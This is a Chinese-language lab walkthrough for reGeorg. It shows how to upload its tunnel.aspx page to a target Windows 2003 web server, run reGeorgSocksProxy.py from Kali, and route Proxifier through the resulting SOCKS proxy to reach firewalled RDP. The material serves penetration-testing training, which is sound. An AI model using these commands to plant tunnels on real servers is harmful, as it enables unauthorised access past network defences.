reGeorg的前身是2008年SensePost在BlackHat USA 2008 的 reDuh延伸與擴展。也是目 前安全從業人員使用最多,范圍最廣,支持多豐富的一款http隧道。從本質上講,可以將 JSP/PHP/ASP/ASPX等頁面上傳到目標服務器,便可以訪問該服務器后面的主機。
攻擊機: 192.168.31.102 kali
192.168.31.96 win 10
靶機: 192.168.31.106 Windows 2003
下載:
https://github.com/sensepost/reGeorg
安裝:
git clone https://github.com/sensepost/reGeorg.git
ls
python reGeorgSocksProxy.py ‐h
PS:這個程序需要安裝PIP urllib3 我的已經裝了
如果沒有安裝的話執行命令:
pip install urllib3
安裝完成后把reGeorg 下的tunnel上傳到目標靶機
目標靶機是開了防火牆的我們訪問是訪問3389是不通的
接下來配置代理
Kali攻擊機執行
python reGeorgSocksProxy.py -u "http://192.168.31.106/include/config/tunnel.aspx" -p 8080 -l 0.0.0.0
þ 這里我們來講講0.0.0.0,如果我們直接ping 0.0.0.0是不行的,他在IPV4中表示的是無效的目標地址,但是在服務器端它表示
本機上的所有IPV4地址,如果一個服務有多個IP地址(192.168.1.2和10.1.1.12),那么我們如果設置的監聽地址是0.0.0.0那
么我們無論是通過IP192.168.1.2還是10.1.1.12都是可以訪問該服務的。在路由中,0.0.0.0表示的是默認路由,即當路由表中
沒有找到完全匹配的路由的時候所對應的路由。
這時候在操作機器
Windows10下配合Proxifier: (沒有這個程序的怎末辦?百度!)
或者鏈接:https://pan.baidu.com/s/1XunHE8RiLu_K4JpWMpVDoA
提取碼:txe6
連接3389